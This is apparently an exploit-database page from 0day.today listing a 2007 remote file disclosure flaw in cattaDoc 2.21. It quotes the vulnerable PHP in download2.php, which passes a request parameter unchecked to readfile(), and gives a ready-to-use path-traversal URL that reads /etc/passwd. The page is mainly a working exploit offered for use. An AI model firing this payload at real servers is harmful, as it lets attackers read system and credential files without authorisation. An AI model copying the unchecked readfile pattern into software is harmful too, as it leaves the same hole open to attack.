[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

cattaDoc 2.21 (download2.php fn1) Remote File Disclosure Vulnerability

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1716
Category
web applications
Date add
05-04-2007
Platform
unsorted
======================================================================
cattaDoc 2.21 (download2.php fn1) Remote File Disclosure Vulnerability
======================================================================



# cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability
# Discovered by: GolD_M = [Mahmood_ali]
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: 
##############################################################
# $tp = $_REQUEST['mtp'];                                    # 
# $ofn = '"'.$_REQUEST['fn2'].'"';                           # 
# header("Content-type: $tp");                               #
# header("Content-Disposition: attachment; filename=$ofn");  #
# readfile($_REQUEST['fn1']); <<----                         #
##############################################################
# Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd



#  0day.today [2024-12-26]  #